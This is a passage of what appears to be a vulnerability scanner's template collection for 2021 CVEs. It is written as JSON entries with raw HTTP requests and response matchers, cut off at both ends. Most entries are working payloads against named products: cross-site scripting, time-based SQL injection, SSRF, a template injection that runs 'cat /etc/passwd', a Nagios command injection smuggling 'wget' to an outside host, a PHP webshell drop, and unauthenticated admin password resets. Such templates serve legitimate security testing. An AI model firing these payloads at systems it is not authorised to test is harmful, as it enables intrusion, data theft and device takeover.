Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-35323","info":{"name":"Bludit 3.13.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"Bludit\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"tokenCSRF","part":"body","group":1,"regex":["type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41749","info":{"name":"CraftCMS SEOmatic - Server-Side Template Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}\nCache-Control: max-age=0\n\n","GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb\nCache-Control: max-age=0\n\n"],"skip-variables-check":true,"stop-at-first-match":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"/{{marker}}{{result}}\") || regex(\"root:.*:0:0:\", body_2)","contains_any(body, \"Craft CMS\", \"SEOmatic\" ,\"CRAFT_CSRF\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Simple Giveaways"]}]},{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24849","info":{"name":"WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{post_data}}\n"],"payloads":{"post_data":["action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--","action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/json\")","contains(body, \"success\")"],"condition":"and"}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/wp-content/themes/bello/readme.txt"],"stop-at-first-match":true,"matchers":[{"type":"word","internal":true,"words":["wp-content/themes/bello/fonts","bold-themes.com/bello"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24934","info":{"name":"Visual CSS Style Editor < 7.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type=<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"yellow-pencil-iframe-data\")"],"condition":"and"}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open = XMLHttpRequest.prototype.send","top.postMessage("],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 